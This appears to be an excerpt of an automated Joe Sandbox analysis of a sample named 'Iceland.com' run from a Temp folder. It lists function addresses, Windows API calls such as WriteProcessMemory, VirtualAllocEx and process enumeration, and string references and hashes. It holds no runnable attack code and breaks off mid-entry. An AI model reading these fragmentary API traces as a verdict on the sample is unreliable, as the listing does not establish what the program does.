Function 009412B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00941469
__freea.LIBCMT ref: 00941487

Part of subcall function 009418A7: _free.LIBCMT ref: 009418BF

Strings

am/pm, xrefs: 009414EA
a/p, xrefs: 0094154E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: bddb00e85f0a024c47e0bfa631fd8db15648374ae4e66105b7f2ea5d8dbb5b40
Instruction ID: ef2df58176d54bd66a5cbe1b112f41e72f398ed0792adb1df33ddaaac8d8a867
Opcode Fuzzy Hash: bddb00e85f0a024c47e0bfa631fd8db15648374ae4e66105b7f2ea5d8dbb5b40
Instruction Fuzzy Hash: 6ED12675A10206DBCB249F68C855FFABBB9FF55310F29415AE9069B260D339DDC0CBA0

Function 00973063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0097BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00972B1D,?,?,00000034,00000800,?,00000034), ref: 0097BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009730AD

Part of subcall function 0097BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00972B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0097BDBF

Part of subcall function 0097BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0097BD1C
Part of subcall function 0097BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00972AE1,00000034,?,?,00001004,00000000,00000000), ref: 0097BD2C
Part of subcall function 0097BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00972AE1,00000034,?,?,00001004,00000000,00000000), ref: 0097BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0097311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00973167

Strings

@, xrefs: 0097317F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: e635f1407b5a81007fe5c7118b393cfdf19654d3f46871e89e7e49731f5896c0
Instruction ID: 1eb324e56a8ce2c55ed0641a3ef27f46906510b62daf30ed47481a2eae313369
Opcode Fuzzy Hash: e635f1407b5a81007fe5c7118b393cfdf19654d3f46871e89e7e49731f5896c0
Instruction Fuzzy Hash: 88412CB2900218BEDB11DBA4CD81BDEBBB8EF49700F008495FA59B7180DB706F85DB60

Function 00941A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\314782\Iceland.com,00000104), ref: 00941AD9
_free.LIBCMT ref: 00941BA4
_free.LIBCMT ref: 00941BAE

Strings

C:\Users\user\AppData\Local\Temp\314782\Iceland.com, xrefs: 00941AD0, 00941AD7, 00941B06, 00941B3E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\314782\Iceland.com
API String ID: 2506810119-181013489
Opcode ID: c9c7c070e3f95278da6a3a0d1632ed7f49e9fedaf5f6c9c47137107a1ec3f0f5
Instruction ID: 7372505f66627b254e7bd31183af0470723f7e5bd6e7fb545be9a811137a2a8a
Opcode Fuzzy Hash: c9c7c070e3f95278da6a3a0d1632ed7f49e9fedaf5f6c9c47137107a1ec3f0f5
Instruction Fuzzy Hash: 4831E471E04208AFDB25DF99CC81D9EBBFCEF84310B1041A6F8049B224E7B08E80DB90

Function 0097CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0097CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 0097CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009E29C0,01435F88), ref: 0097CC40

Strings

0, xrefs: 0097CB8A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 63feb9cc03d43edc2ea318c11bbe95a161af889e12a4a29151d9fe75ff1b5056
Instruction ID: fa26fd52ac5937608cf08dc0fb30187eccc32ced912e7870cf2ca02d21e12412
Opcode Fuzzy Hash: 63feb9cc03d43edc2ea318c11bbe95a161af889e12a4a29151d9fe75ff1b5056
Instruction Fuzzy Hash: DF41B0B22043029FD725DF24D885B5ABBE8EF85714F188A1DF4A9972D1DB30E904CB62

Function 009A4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009ADCD0,00000000,?,?,?,?), ref: 009A4F48
GetWindowLongW.USER32 ref: 009A4F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009A4F75

Strings

SysTreeView32, xrefs: 009A4F1A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ea239fe9663cb06daf8491f83ec758d94727227b27c186fcaa900bcdd1dab987
Instruction ID: f7d510c5d3f54643e1a49c9edd011e1470317cd56fa6a4fd859c9013cec32b86
Opcode Fuzzy Hash: ea239fe9663cb06daf8491f83ec758d94727227b27c186fcaa900bcdd1dab987
Instruction Fuzzy Hash: 4731A271254205AFDB218F78DC45BEA77A9EF8A334F204715F975921E0D7B0EC509B90

Function 00993AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00993DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00993AD4,?,?), ref: 00993DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00993AD7
_wcslen.LIBCMT ref: 00993AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00993B63

Strings

255.255.255.255, xrefs: 00993AF2, 00993AF7

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: acfaa8ed668969c93348daf8e3a6cf507cb5eb2d2709a69445ef64878aa7bbbb
Instruction ID: 21b157b109f58da79f0bd64686db1874227a9c619ed1b7d0efef925a3114a9b0
Opcode Fuzzy Hash: acfaa8ed668969c93348daf8e3a6cf507cb5eb2d2709a69445ef64878aa7bbbb
Instruction Fuzzy Hash: 6D31BE392002019FCF20CF6DC486ABAB7E5EF55328F24C159E8168B7A2D735EE41CB60

Function 009A4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 009A49DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 009A49F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 009A4A14

Strings

SysMonthCal32, xrefs: 009A49A7

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: e3547bc2696340f78d11e85b89c30da855a915f2fb7729643e92c7ea7a349109
Instruction ID: 1d5bcf7898214cd017a7b0d8133844d19492e49b9fbeac5ff67771d256b87a9b
Opcode Fuzzy Hash: e3547bc2696340f78d11e85b89c30da855a915f2fb7729643e92c7ea7a349109
Instruction Fuzzy Hash: 0A21BC32650219BBDF118F90CC86FEB3B69EF89728F110214FA156B190D6B1A8519BE0

Function 009A50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 009A51A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 009A51B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009A51B8

Strings

msctls_updown32, xrefs: 009A5122

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 72a1e9f5de2b7b6ccdf98eb9edb867f0facad19cae37610729571120ca416619
Instruction ID: bfdb784431e580888692b0f7e91d4d95960e062eeca1919fa72ec139f9e6bc5b
Opcode Fuzzy Hash: 72a1e9f5de2b7b6ccdf98eb9edb867f0facad19cae37610729571120ca416619
Instruction Fuzzy Hash: 19218CB5604649AFDB00DF28CCC5EBB37ADEF9A368B010059F9009B361CB70EC01DAA0

Function 009A4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 009A42DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 009A42EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 009A4312

Strings

Listbox, xrefs: 009A42AB

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 5a334ce77613be5babbf265de35a32fe7869f4e2a5eb992a8b6c2284cde9f39c
Instruction ID: 2bb3a16a9e1b5712db05659c534c78ed6a647328f39611292d0e308f0442b68a
Opcode Fuzzy Hash: 5a334ce77613be5babbf265de35a32fe7869f4e2a5eb992a8b6c2284cde9f39c
Instruction Fuzzy Hash: 29219F72614218BBEF118F94CC85FAF3B6EEFCA764F118114F9159B190CAB19C529BE0

Function 00985439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0098544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009854A1
SetErrorMode.KERNEL32(00000000,?,?,009ADCD0), ref: 00985515

Strings

%lu, xrefs: 009854B4

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: a10ec4fa00abd662f8b1050888555b0a0998520a275fa3a72bd9bda68aa6a22d
Instruction ID: ad0eaadd3a72a5e69934e82e7d62e7e315c92f5b277af3d4072d8257832ffdca
Opcode Fuzzy Hash: a10ec4fa00abd662f8b1050888555b0a0998520a275fa3a72bd9bda68aa6a22d
Instruction Fuzzy Hash: 45316175A00108AFD710EF64C885EAA7BF8EF45308F1580A5F909DB362D771EE45DBA1

Function 009A4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009A4CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009A4D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009A4D0F

Strings

msctls_trackbar32, xrefs: 009A4CC4

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 7afa878f66431854601d7176e55ac8b0de7f73eab928d900e9ee5dc49ebcf691
Instruction ID: 56433c630a0b155f1f6c5d9be7953e0cca062fec98f8a230c81fbd5a8ad2d576
Opcode Fuzzy Hash: 7afa878f66431854601d7176e55ac8b0de7f73eab928d900e9ee5dc49ebcf691
Instruction Fuzzy Hash: 5311E371240248BEEF215F69CC46FEB3BACEFC6B64F110514FA55E60A0C6B1DC519B60

Function 0097389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00918577: _wcslen.LIBCMT ref: 0091858A

Part of subcall function 009736F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00973712
Part of subcall function 009736F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00973723
Part of subcall function 009736F4: GetCurrentThreadId.KERNEL32 ref: 0097372A
Part of subcall function 009736F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00973731

GetFocus.USER32 ref: 009738C4

Part of subcall function 0097373B: GetParent.USER32(00000000), ref: 00973746

GetClassNameW.USER32(?,?,00000100), ref: 0097390F
EnumChildWindows.USER32(?,00973987), ref: 00973937

Strings

%s%d, xrefs: 0097394B

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 3006ef31feae88bc94e8d288c6aaa8cb070d4fea43c33c6e94bfe9acb5b74db7
Instruction ID: b42b42c9c558db717e603fb1173e2e205c9c776c2eb09fb87272d82fce687b3a
Opcode Fuzzy Hash: 3006ef31feae88bc94e8d288c6aaa8cb070d4fea43c33c6e94bfe9acb5b74db7
Instruction Fuzzy Hash: 83117572700209ABCF11BF749C86FEE776A9FD4304F04C065B94D9B296DF709A45AB60

Function 009A6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009A6360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009A638D
DrawMenuBar.USER32(?), ref: 009A639C

Strings

0, xrefs: 009A632E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: cc351fa85b6c8f9aba38508b3eb4166aa28b4e5aa39d8e6966ea430b1917cb7a
Instruction ID: 80df69d5ce60b7d21eb01a81201d54ccfc51eade56bbc2fd03daf5d21c40be71
Opcode Fuzzy Hash: cc351fa85b6c8f9aba38508b3eb4166aa28b4e5aa39d8e6966ea430b1917cb7a
Instruction Fuzzy Hash: 1001CC71A14208AFDF209F50DC84BAE7BB8FF86310F148099F84AD6150CF318A81EFA0

Function 0097096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccd56a3f0d89c47ea674c27648f0325b0f2b9cb3038af9dea354b23c9e193ae
Instruction ID: 16ff9c0e6d1325f13c84b769248a53f6ba201e3deb7d51861323b2255d8034f7
Opcode Fuzzy Hash: 7ccd56a3f0d89c47ea674c27648f0325b0f2b9cb3038af9dea354b23c9e193ae
Instruction Fuzzy Hash: 80C15E76A0020AEFDB15CF94C894EAEB7B9FF88704F148598E509DB251D731EE41DB90

Function 009441F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0094427E
__alldvrm.LIBCMT ref: 0094447F
__alldvrm.LIBCMT ref: 009444A1

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 18667f9adafbbb0e03aa04b3d8c73b0638060cf0dea343ce08098be8ed0b3bc4
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: 64A19C729047869FEB21CF28C891FBEBBE8EF51314F1441ADE9959B291C3389D41CB50

Function 00970D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009B0BD4,?), ref: 00970EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009B0BD4,?), ref: 00970EF8
CLSIDFromProgID.OLE32(?,?,00000000,009ADCE0,000000FF,?,00000000,00000800,00000000,?,009B0BD4,?), ref: 00970F1D
_memcmp.LIBVCRUNTIME ref: 00970F3E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: bc46e9c60d2f4623d0c854f0164133a841746d61f82533ab6fcd84f8caa6bd71
Instruction ID: a8d3b993759be13eab86352ca262902116b6ac906561d87fda8a140deb2a5047
Opcode Fuzzy Hash: bc46e9c60d2f4623d0c854f0164133a841746d61f82533ab6fcd84f8caa6bd71
Instruction Fuzzy Hash: D2812E72A00209EFCB14DF94C984EEEB7B9FF89315F108558F506AB250DB71AE46CB60

Function 0099B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0099B10C
Process32FirstW.KERNEL32(00000000,?), ref: 0099B11A

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Process32NextW.KERNEL32(00000000,?), ref: 0099B1FC
CloseHandle.KERNEL32(00000000), ref: 0099B20B

Part of subcall function 0092E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00954D73,?), ref: 0092E395

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 24335c10e9cfea59b1f381f32ddce0142855b5d3a61f442e99b29250085e48d4
Instruction ID: 8adfb4273953f75886c8e34a4dd544c86a729d52160b56abff7ab2712ed293e5
Opcode Fuzzy Hash: 24335c10e9cfea59b1f381f32ddce0142855b5d3a61f442e99b29250085e48d4
